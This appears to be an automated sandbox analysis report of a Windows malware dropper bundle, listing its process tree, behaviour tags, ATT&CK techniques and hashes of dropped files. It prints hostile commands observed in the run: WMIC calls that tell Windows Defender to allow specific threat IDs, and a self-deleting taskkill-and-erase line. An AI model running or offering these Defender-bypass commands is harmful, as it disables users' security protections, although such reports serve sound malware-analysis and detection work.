C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Users\Admin\AppData\Roaming\ustucsuC:\Users\Admin\AppData\Roaming\ustucsu2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jftucsuC:\Users\Admin\AppData\Roaming\jftucsu2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\jftucsuC:\Users\Admin\AppData\Roaming\jftucsu3⤵
-
C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exeC:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exeC:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task3⤵
-
C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exeC:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exeC:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\ustucsuC:\Users\Admin\AppData\Roaming\ustucsu2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jftucsuC:\Users\Admin\AppData\Roaming\jftucsu2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\jftucsuC:\Users\Admin\AppData\Roaming\jftucsu3⤵
-
C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exeC:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exeC:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task3⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20de8d8504.exeSat20de8d8504.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\is-CE48P.tmp\Sat20fbae42a4.tmp"C:\Users\Admin\AppData\Local\Temp\is-CE48P.tmp\Sat20fbae42a4.tmp" /SL5="$A003A,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20fbae42a4.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-VFETQ.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-VFETQ.tmp\Ze2ro.exe" /S /UID=burnerch22⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe"C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe" /VERYSILENT3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HAG27.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-HAG27.tmp\ultramediaburner.tmp" /SL5="$203E2,281924,62464,C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe" /VERYSILENT4⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\35-b6682-3e7-e0b82-f2c57efe1be68\Direhilomi.exe"C:\Users\Admin\AppData\Local\Temp\35-b6682-3e7-e0b82-f2c57efe1be68\Direhilomi.exe"3⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\b5-adbe7-0ae-1d288-55e912e067319\Qaemukyrely.exe"C:\Users\Admin\AppData\Local\Temp\b5-adbe7-0ae-1d288-55e912e067319\Qaemukyrely.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20627fa1c49.exeSat20627fa1c49.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20545a92617f.exeSat20545a92617f.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6602⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6762⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6882⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 7402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 9002⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 9722⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 11802⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat20545a92617f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20545a92617f.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sat20545a92617f.exe" /f3⤵
- Kills process with taskkill
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SysWOW64\qinbwhni\ushtnjuk.exeC:\Windows\SysWOW64\qinbwhni\ushtnjuk.exe /d"C:\Users\Admin\AppData\Local\Temp\72AC.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess2⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"3⤵
- Loads dropped DLL
- Modifies registry class
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Change Default File Association
1Registry Run Keys / Startup Folder
3New Service
1Scheduled Task
1Defense Evasion
Modify Registry
7Disabling Security Tools
2Virtualization/Sandbox Evasion
1File Permissions Modification
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157MD5
f7dcb24540769805e5bb30d193944dce
SHA1e26c583c562293356794937d9e2e6155d15449ee
SHA2566b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea
SHA512cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157MD5
1e988c5d3d908160e6d43462ec2e5e59
SHA105b17f00be1d06e1312c8864f9a7225cbd861630
SHA25691668963bc5253a1754096b2ba69d1ac07a909579f3b528bd687c7f6eea06bd8
SHA512bbe9059e0af66268b910dfb9cb0c7ba6923779c2c19584eb36c2d9dd2e5cda633eb4ffb9292f4c4d46e20efd17b552079c2dae9daaad5e190342fe3b7373e017
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat200240b71b.exeMD5
e268a668b507c25263cb0b8bb3aeb3be
SHA1e116499e5b99f81580601b780f6018fe5c0a7f65
SHA25682c816980fe9b0de916fc1954a2e1db51011770f794f8fd15a2e84656962e6b7
SHA512543654e296d299febbbf2dd43e565cf4199b3c7cffc8db5ffd490b51c4753d38b080fe72b73e79bbcdb3853227f9198bf6c88a6d230e68a6017d1fbc03c461e4
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat200240b71b.exeMD5
e268a668b507c25263cb0b8bb3aeb3be
SHA1e116499e5b99f81580601b780f6018fe5c0a7f65
SHA25682c816980fe9b0de916fc1954a2e1db51011770f794f8fd15a2e84656962e6b7
SHA512543654e296d299febbbf2dd43e565cf4199b3c7cffc8db5ffd490b51c4753d38b080fe72b73e79bbcdb3853227f9198bf6c88a6d230e68a6017d1fbc03c461e4
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exeMD5
b39390c4c99cb81fceb07a8fc50c0ed8
SHA15c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1
SHA2566e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd
SHA5129112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exeMD5
b39390c4c99cb81fceb07a8fc50c0ed8
SHA15c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1
SHA2566e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd
SHA5129112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exeMD5
b39390c4c99cb81fceb07a8fc50c0ed8
SHA15c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1
SHA2566e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd
SHA5129112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exeMD5
b39390c4c99cb81fceb07a8fc50c0ed8
SHA15c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1
SHA2566e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd
SHA5129112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20545a92617f.exeMD5
b00df112121b08e3f1efd4f75c851880
SHA18c620d2ef13e65f592c07c520454a2b3ab6b189b
SHA256e6e6e5cfa2221a0e86f13297685d2cdb6e06a47000a6545bfe8971cf24bc04b2
SHA512bf0c8b0ac5719f2a66cfffc86eba47b4fc70e9c075b64ae9f6e5ef006b742c748101a3788d57bc56a239edbcdf7630499cdaba8945acc17a04fd1b0f71337c6b
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20545a92617f.exeMD5
b00df112121b08e3f1efd4f75c851880
SHA18c620d2ef13e65f592c07c520454a2b3ab6b189b
SHA256e6e6e5cfa2221a0e86f13297685d2cdb6e06a47000a6545bfe8971cf24bc04b2
SHA512bf0c8b0ac5719f2a66cfffc86eba47b4fc70e9c075b64ae9f6e5ef006b742c748101a3788d57bc56a239edbcdf7630499cdaba8945acc17a04fd1b0f71337c6b
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20578e6239.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20578e6239.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat205eb4a2ece877a.exeMD5
63846f6a2c15fb8d0bd80c63d8406aec
SHA1c566c716ed8c3c69f63d866d2c7a041bdf00b4e5
SHA25683664d9745f1f75b770b960a253e5efc0ff4ee06b72083fa8be2bbf801328d3e
SHA51287f0f76b522da421d8ada6ff786be97099439598445663df49791210bd4e29e4b41efe886ab77765ba0d069a1565ba9b7fc2b0b68dc86eebcd62a122a6f59007
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat205eb4a2ece877a.exeMD5
63846f6a2c15fb8d0bd80c63d8406aec
SHA1c566c716ed8c3c69f63d866d2c7a041bdf00b4e5
SHA25683664d9745f1f75b770b960a253e5efc0ff4ee06b72083fa8be2bbf801328d3e
SHA51287f0f76b522da421d8ada6ff786be97099439598445663df49791210bd4e29e4b41efe886ab77765ba0d069a1565ba9b7fc2b0b68dc86eebcd62a122a6f59007
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20627fa1c49.exeMD5
43ec4a753c87d7139503db80562904a7
SHA17f6f36e0a1e122234f109ff0b4c7318486e764e0
SHA256282eb8e7745f9396a2551817e90afbdfe54a77c427c3050fd0ec638fb2f50dc3
SHA512da7f0a19c3d391a87dbc86b49239ad11d052ebedc1856dab2524ed33e98690e209d61376c4e913a5ec0908920ea7204fa0c38123ad95937780c9f3518e4bb9bf
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20627fa1c49.exeMD5
43ec4a753c87d7139503db80562904a7
SHA17f6f36e0a1e122234f109ff0b4c7318486e764e0
SHA256282eb8e7745f9396a2551817e90afbdfe54a77c427c3050fd0ec638fb2f50dc3
SHA512da7f0a19c3d391a87dbc86b49239ad11d052ebedc1856dab2524ed33e98690e209d61376c4e913a5ec0908920ea7204fa0c38123ad95937780c9f3518e4bb9bf
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2071d99516dc03841.exeMD5
f7ad507592d13a7a2243d264906de671
SHA113e5bfa6cdd1c96b6c9e2170f090e3b260ae95e5
SHA256d5959e437e58709c5e5e7a923efe7351b28bedef15cb00cd9fdb4e5e955b2a13
